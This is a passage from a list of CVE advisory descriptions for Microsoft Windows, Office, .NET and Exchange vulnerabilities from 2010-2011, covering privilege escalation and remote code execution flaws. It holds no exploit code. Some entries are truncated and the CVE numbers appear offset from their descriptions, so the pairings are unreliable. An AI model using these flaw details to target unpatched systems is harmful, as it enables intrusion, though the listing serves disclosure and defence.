SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0671] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0670] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0667] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0666] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0665] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0664] Microsoft .NET Framework 2.0 SP1 and SP2, 3.5 Gold and SP1, 3.5.1, and 4.0, and Silverlight 4 before 4.0.60531.0, does not properly validate arguments to unspecified networking API functions, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, (3) a crafted .NET Framework application, or (4) a crafted Silverlight application, aka ".NET Framework Array Offset Vulnerability." [CVE-2011-0662] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0661] The SMB Server service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate fields in SMB requests, which allows remote attackers to execute arbitrary code via a malformed request in a (1) SMBv1 or (2) SMBv2 packet, aka "SMB Transaction Parsing Vulnerability." [CVE-2011-0660] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Response Parsing Vulnerability." [CVE-2011-0658] Integer underflow in the OLE Automation protocol implementation in VBScript.dll in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted WMF file, aka "OLE Automation Underflow Vulnerability." [CVE-2011-0657] DNSAPI.dll in the DNS client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process DNS queries, which allows remote attackers to execute arbitrary code via (1) a crafted LLMNR broadcast query or (2) a crafted application, aka "DNS Query Vulnerability." [CVE-2011-0656] Microsoft PowerPoint 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0655] Microsoft PowerPoint 2007 SP2 and 2010 [CVE-2011-0654] Integer underflow in the BowserWriteErrorLogEntry function in the Common Internet File System (CIFS) browser service in Mrxsmb.sys or bowser.sys in Active Directory in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via a malformed BROWSER ELECTION message, leading to a heap-based buffer overflow, aka "Browser Pool Corruption Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2011-0107] Untrusted search path vulnerability in Microsoft Office XP SP3, Office 2003 SP3, and Office 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .docx file, aka "Office Component Insecure Library Loading Vulnerability." [CVE-2011-0105] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac obtain a certain length value from an uninitialized memory location, which allows remote attackers to trigger a buffer overflow and execute arbitrary code via a crafted Excel file, aka "Excel Data Initialization Vulnerability." [CVE-2011-0104] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted HLink record in an Excel file, aka "Excel Buffer Overwrite Vulnerability." [CVE-2011-0103] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted record information in an Excel file, aka "Excel Memory Corruption Vulnerability." [CVE-2011-0101] Microsoft Excel 2002 SP3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted RealTimeData record, related to a stTopic field, doubly-byte characters, and an incorrect pointer calculation, aka "Excel Record Parsing WriteAV Vulnerability." [CVE-2011-0098] Integer signedness error in Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0097] Integer underflow in Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0096] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for content blocks in a document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-0093] ELEMENTS.DLL in Microsoft Visio 2002 SP2, 2003 SP3, and 2007 SP2 does not properly parse structures during the opening of a Visio file, which allows remote attackers to execute arbitrary code via a file containing a malformed structure, aka "Visio Data Type Memory Corruption Vulnerability." [CVE-2011-0092] The LZW stream decompression functionality in ORMELEMS.DLL in Microsoft Visio 2002 SP2, 2003 SP3, and 2007 SP2 allows remote attackers to execute arbitrary code via a Visio file with a malformed VisioDocument stream that triggers an exception handler that accesses an object that has not been fully initialized, which triggers memory corruption, aka "Visio Object Memory Corruption Vulnerability." [CVE-2011-0091] Kerberos in Microsoft Windows Server 2008 R2 and Windows 7 does not prevent a session from changing from strong encryption to DES encryption, which allows man-in-the-middle attackers to spoof network traffic and obtain sensitive information via a DES downgrade, aka "Kerberos Spoofing Vulnerability." [CVE-2011-0090] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2011-0089] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Improper Pointer Validation Vulnerability." [CVE-2011-0088] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Pointer Confusion Vulnerability." [CVE-2011-0087] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient User Input Validation Vulnerability." [CVE-2011-0086] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Improper User Input Validation Vulnerability." [CVE-2011-0043] Kerberos in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 supports weak hashing algorithms, which allows local users to gain privileges by operating a service that sends crafted service tickets, as demonstrated by the CRC32 algorithm, aka "Kerberos Unkeyed Checksum Vulnerability." [CVE-2011-0042] SBE.dll in the Stream Buffer Engine in Windows Media Player and Windows Media Center in Microsoft Windows XP SP2 and SP3, Windows XP Media Center Edition 2005 SP3, Windows Vista SP1 and SP2, Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista does not properly parse Digital Video Recording (.dvr-ms) files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DVR-MS Vulnerability." [CVE-2011-0041] Integer overflow in gdiplus.dll in GDI+ in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted EMF image, aka "GDI+ Integer Overflow Vulnerability." [CVE-2011-0040] The server in Microsoft Active Directory on Windows Server 2003 SP2 does not properly handle an update request for a service principal name (SPN), which allows remote attackers to cause a denial of service (authentication downgrade or outage) via a crafted request that triggers name collisions, aka "Active Directory SPN Validation Vulnerability." [CVE-2011-0039] The Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly process authentication requests, which allows local users to gain privileges via a request with a crafted length, aka "LSASS Length Validation Vulnerability." [CVE-2011-0034] Stack-based buffer overflow in the OpenType Compact Font Format (aka OTF or CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted parameter values in an OpenType font, aka "OpenType Font Stack Overflow Vulnerability." [CVE-2011-0033] The OpenType Compact Font Format (CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate parameter values in OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted font, aka "OpenType Font Encoded Character Vulnerability." [CVE-2011-0032] Untrusted search path vulnerability in DirectShow in Microsoft Windows Vista SP1 and SP2, Windows 7 Gold and SP1, Windows Server 2008 R2 and R2 SP1, and Windows Media Center TV Pack for Windows Vista allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Digital Video Recording (.dvr-ms), Windows Recorded TV Show (.wtv), or .mpg file, aka "DirectShow Insecure Library Loading Vulnerability." [CVE-2011-0031] The (1) JScript 5.8 and (2) VBScript 5.8 scripting engines in Microsoft Windows Server 2008 R2 and Windows 7 do not properly load decoded scripts obtained from web pages, which allows remote attackers to trigger memory corruption and consequently obtain sensitive information via a crafted web site, aka "Scripting Engines Information Disclosure Vulnerability." [CVE-2011-0030] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Elevation of Privilege Vulnerability," a different vulnerability than CVE-2010-0023. [CVE-2011-0028] WordPad in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse fields in Word documents, which allows remote attackers to execute arbitrary code via a crafted .doc file, aka "WordPad Converter Parsing Vulnerability." [CVE-2010-5082] Untrusted search path vulnerability in colorcpl.exe 6.0.6000.16386 in the Color Control Panel in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges via a Trojan horse sti.dll file in the current working directory, as demonstrated by a directory that contains a .camp, .cdmp, .gmmp, .icc, or .icm file, aka "Color Control Panel Insecure Library Loading Vulnerability." [CVE-2010-4701] Heap-based buffer overflow in the CDrawPoly::Serialize function in fxscover.exe in Microsoft Windows Fax Services Cover Page Editor 5.2 r2 in Windows XP Professional SP3, Server 2003 R2 Enterprise Edition SP2, and Windows 7 Professional allows remote attackers to execute arbitrary code via a long record in a Fax Cover Page (.cov) file. NOTE: some of these details are obtained from third party information. [CVE-2010-4669] The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 allows remote attackers to cause a denial of service (CPU consumption and system hang) by sending many Router Advertisement (RA) messages with different source addresses, as demonstrated by the flood_router6 program in the thc-ipv6 package. [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652. [CVE-2010-4398] Stack-based buffer overflow in the RtlQueryRegistryValues function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges, and bypass the User Account Control (UAC) feature, via a crafted REG_BINARY value for a SystemDefaultEUDCFont registry key, aka "Driver Improper Interaction with Windows Kernel Vulnerability." [CVE-2010-4182] Untrusted search path vulnerability in the Data Access Objects (DAO) library (dao360.dll) in Microsoft Windows XP Professional SP3, Windows Server 2003 R2 Enterprise Edition SP3, Windows Vista Business SP1, and Windows 7 Professional allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse msjet49.dll that is located in the same folder as a file that is processed by dao360.dll. NOTE: the provenance of this information is unknown [CVE-2010-3974] fxscover.exe in the Fax Cover Page Editor in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse FAX cover pages, which allows remote attackers to execute arbitrary code via a crafted .cov file, aka "Fax Cover Page Editor Memory Corruption Vulnerability." [CVE-2010-3970] Stack-based buffer overflow in the CreateSizedDIBSECTION function in shimgvw.dll in the Windows Shell graphics processor (aka graphics rendering engine) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted .MIC or unspecified Office document containing a thumbnail bitmap with a negative biClrUsed value, as reported by Moti and Xu Hao, aka "Windows Shell Graphics Processing Overrun Vulnerability." [CVE-2010-3966] Untrusted search path vulnerability in Microsoft Windows Server 2008 R2 and Windows 7, when BranchCache is supported, allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an EML file, an RSS file, or a WPOST file, aka "BranchCache Insecure Library Loading Vulnerability." [CVE-2010-3965] Untrusted search path vulnerability in Windows Media Encoder 9 on Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Windows Media Profile (PRX) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3964] Unrestricted file upload vulnerability in the Document Conversions Launcher Service in Microsoft Office SharePoint Server 2007 SP2, when the Document Conversions Load Balancer Service is enabled, allows remote attackers to execute arbitrary code via a crafted SOAP request to TCP port 8082, aka "Malformed Request Code Execution Vulnerability." [CVE-2010-3963] Buffer overflow in the Routing and Remote Access NDProxy component in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, related to the Routing and Remote Access service (RRAS) and improper copying from user mode to the kernel, aka "Kernel NDProxy Buffer Overflow Vulnerability." [CVE-2010-3961] The Consent User Interface (UI) in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle an unspecified registry-key value, which allows local users with SeImpersonatePrivilege rights to gain privileges via a crafted application, aka "Consent UI Impersonation Vulnerability." [CVE-2010-3960] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, and R2 allows guest OS users to cause a denial of service (host OS hang) by sending a crafted encapsulated packet over the VMBus, aka "Hyper-V VMBus Vulnerability." [CVE-2010-3959] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted CMAP table in an OpenType font, aka "OpenType CMAP Table Vulnerability." [CVE-2010-3958] The x86 JIT compiler in Microsoft .NET Framework 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 does not properly compile function calls, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Stack Corruption Vulnerability." [CVE-2010-3957] Double free vulnerability in the OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Double Free Vulnerability." [CVE-2010-3956] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly perform array indexing, which allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Index Vulnerability." [CVE-2010-3955] pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3 does not properly perform array indexing, which allows remote attackers to execute arbitrary code via a crafted Publisher file that uses an old file format, aka "Array Indexing Memory Corruption Vulnerability." [CVE-2010-3954] Microsoft Publisher 2002 SP3, 2003 SP3, and 2010 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Publisher file, aka "Microsoft Publisher Memory Corruption Vulnerability." [CVE-2010-3946] Integer overflow in the PICT image converter in the graphics filters in Microsoft Office XP SP3, Office 2003 SP3, and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted PICT image in an Office document, aka "PICT Image Converter Integer Overflow Vulnerability." [CVE-2010-3945] Buffer overflow in the CGM image converter in the graphics filters in Microsoft Office XP SP3, Office 2003 SP3, and Office Converter Pack allows remote attackers to execute arbitrary code via a crafted CGM image in an Office document, aka "CGM Image Converter Buffer Overrun Vulnerability." [CVE-2010-3944] win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2010-3943] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly link driver objects, which allows local users to gain privileges via a crafted application that triggers linked-list corruption, aka "Win32k Cursor Linking Vulnerability." [CVE-2010-3942] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for copies from user mode, which allows local users to gain privileges via a crafted application, aka "Win32k WriteAV Vulnerability." [CVE-2010-3941] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k Double Free Vulnerability." [CVE-2010-3940] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k PFE Pointer Double Free Vulnerability." [CVE-2010-3939] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via vectors related to improper memory allocation for copies from user mode, aka "Win32k Buffer Overflow Vulnerability." [CVE-2010-3937] Microsoft Exchange Server 2007 SP2 on the x64 platform allows remote authenticated users to cause a denial of service (infinite loop and MSExchangeIS outage) via a crafted RPC request, aka "Exchange Server Infinite Loop Vulnerability." [CVE-2010-3338] The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka "Task Scheduler Vulnerability." NOTE: this might overlap CVE-2010-3888. [CVE-2010-3337] Untrusted search path vulnerability in Microsoft Office 2007 SP2 and 2010 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Insecure Library Loading Vulnerability." NOTE: this might overlap CVE-2010-3141 and CVE-2010-3142. [CVE-2010-3336] Microsoft Office XP SP3, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption, aka "MSO Large SPID Read AV Vulnerability." [CVE-2010-3335] Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption, aka "Drawing Exception Handling Vulnerability." [CVE-2010-3334] Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via an Office document containing an Office Art Drawing record with crafted msofbtSp records and unspecified flags, which triggers memory corruption, aka "Office Art Drawing Records Vulnerability." [CVE-2010-3333] Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability." [CVE-2010-3332] Microsoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka "ASP.NET Padding Oracle Vulnerability." [CVE-2010-3324] The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and conduct XSS attacks via a crafted use of the Cascading Style Sheets (CSS) @import rule, aka "HTML Sanitization Vulnerability," a different vulnerability than CVE-2010-1257. [CVE-2010-3243] Cross-site scripting (XSS) vulnerability in the toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2 and Office SharePoint Server 2007 SP2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "HTML Sanitization Vulnerability." [CVE-2010-3242] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Ghost Record Type Parsing Vulnerability." [CVE-2010-3241] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate binary file-format information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Out-of-Bounds Memory Write in Parsing Vulnerability." [CVE-2010-3240] Microsoft Excel 2002 SP3 and 2007 SP2 [CVE-2010-3239] Microsoft Excel 2002 SP3 does not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Extra Out of Boundary Record Parsing Vulnerability." [CVE-2010-3238] Microsoft Excel 2002 SP3 and 2003 SP3, and Office 2004 for Mac, does not properly validate binary file-format information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Negative Future Function Vulnerability." [CVE-2010-3237] Microsoft Excel 2002 SP3 and Office 2004 for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Merge Cell Record Pointer Vulnerability." [CVE-2010-3236] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Out Of Bounds Array Vulnerability." [CVE-2010-3235] Microsoft Excel 2002 SP3 does not properly validate formula information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Formula Biff Record Vulnerability." [CVE-2010-3234] Microsoft Excel 2002 SP3 does not properly validate formula information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Formula Substream Memory Corruption Vulnerability." [CVE-2010-3233] Microsoft Excel 2002 SP3 and 2003 SP3 does not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted .wk3 (aka Lotus 1-2-3 workbook) file, aka "Lotus 1-2-3 Workbook Parsing Vulnerability." [CVE-2010-3232] Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2010-3231] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Excel Record Parsing Memory Corruption Vulnerability." [CVE-2010-3230] Integer overflow in Microsoft Excel 2002 SP3 allows remote attackers to execute arbitrary code via an Excel document with crafted record information, aka "Excel Record Parsing Integer Overflow Vulnerability." [CVE-2010-3229] The Secure Channel (aka SChannel) security package in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when IIS 7.x is used, does not properly process client certificates during SSL and TLS handshakes, which allows remote attackers to cause a denial of service (LSASS outage and reboot) via a crafted packet, aka "TLSv1 Denial of Service Vulnerability." [CVE-2010-3227] Stack-based buffer overflow in the UpdateFrameTitleForDocument method in the CFrameWnd class in mfc42.dll in the Microsoft Foundation Class (MFC) Library in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows context-dependent attackers to execute arbitrary code via a long window title that this library attempts to create at the request of an application, as demonstrated by the Trident PowerZip 7.2 Build 4010 application, aka "Windows MFC Document Title Updating Buffer Overflow Vulnerability." [CVE-2010-3223] The user interface in Microsoft Cluster Service (MSCS) in Microsoft Windows Server 2008 R2 does not properly set administrative-share permissions for new cluster disks that are shared as part of a failover cluster, which allows remote attackers to read or modify data on these disks via requests to the associated share, aka "Permissions on New Cluster Disks Vulnerability." [CVE-2010-3222] Stack-based buffer overflow in the Remote Procedure Call Subsystem (RPCSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted LPC message that requests an LRPC connection from an LPC server to a client, aka "LPC Message Buffer Overrun Vulnerability." [CVE-2010-3221] Microsoft Word 2002 SP3 and 2003 SP3, Office 2004 for Mac, and Word Viewer do not properly handle a malformed record during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Parsing Vulnerability." [CVE-2010-3220] Unspecified vulnerability in Microsoft Word 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Word document that triggers memory corruption, aka "Word Parsing Vulnerability." [CVE-2010-3219] Array index vulnerability in Microsoft Word 2002 SP3 allows remote attackers to execute arbitrary code via a crafted Word document that triggers memory corruption, aka "Word Index Parsing Vulnerability." [CVE-2010-3218] Heap-based buffer overflow in Microsoft Word 2002 SP3 allows remote attackers to execute arbitrary code via malformed records in a Word document, aka "Word Heap Overflow Vulnerability." [CVE-2010-3217] Double free vulnerability in Microsoft Word 2002 SP3 allows remote attackers to execute arbitrary code via a Word document with crafted List Format Override (LFO) records, aka "Word Pointer Vulnerability." [CVE-2010-3216] Microsoft Word 2002 SP3 and Office 2004 for Mac allow remote attackers to execute arbitrary code via a crafted Word document containing bookmarks that trigger use of an invalid pointer and memory corruption, aka "Word Bookmarks Vulnerability." 